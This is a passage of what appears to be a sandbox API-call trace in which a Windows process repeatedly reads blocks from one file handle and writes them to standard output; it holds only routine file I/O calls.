(_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.164] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.164] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] GetFileType (hFile=0x50) returned 0x1 [0144.164] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.164] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] GetFileType (hFile=0x50) returned 0x1 [0144.165] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.165] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.165] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.165] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.166] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.166] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.166] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.166] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.167] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.167] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, 
lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.167] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.167] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, 
lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.168] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.168] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] GetFileType (hFile=0x50) returned 0x1 [0144.168] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.168] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, 
lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] GetFileType (hFile=0x50) returned 0x1 [0144.169] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.169] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.170] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.170] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0144.170] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] GetFileType (hFile=0x50) returned 0x1 [0144.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.170] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] 
GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.171] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.171] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | 
out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] GetFileType (hFile=0x50) returned 0x1 [0144.171] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.171] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, 
lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] GetFileType (hFile=0x50) returned 0x1 [0144.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.172] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.172] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) returned 1 [0144.172] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.172] ReadFile (in: hFile=0x58, lpBuffer=0x2eee9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee08c, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesRead=0x2ee08c*=0x200, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eee9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eee9c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eeeec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eeeec*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 
[0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eef3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef3c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eef8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eef8c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2eefdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2eefdc*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] GetFileType (hFile=0x50) returned 0x1 [0144.173] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.173] WriteFile (in: hFile=0x50, lpBuffer=0x2ef02c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef02c*, lpNumberOfBytesWritten=0x2ee080*=0x50, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] GetFileType (hFile=0x50) returned 0x1 [0144.174] _get_osfhandle (_FileHandle=1) returned 0x50 [0144.174] WriteFile (in: hFile=0x50, lpBuffer=0x2ef07c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee080, lpOverlapped=0x0 | out: lpBuffer=0x2ef07c*, lpNumberOfBytesWritten=0x2ee080*=0x20, lpOverlapped=0x0) returned 1 [0144.174] _get_osfhandle (_FileHandle=4) returned 0x58 [0144.174] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee06c | out: lpNewFilePointer=0x0) 
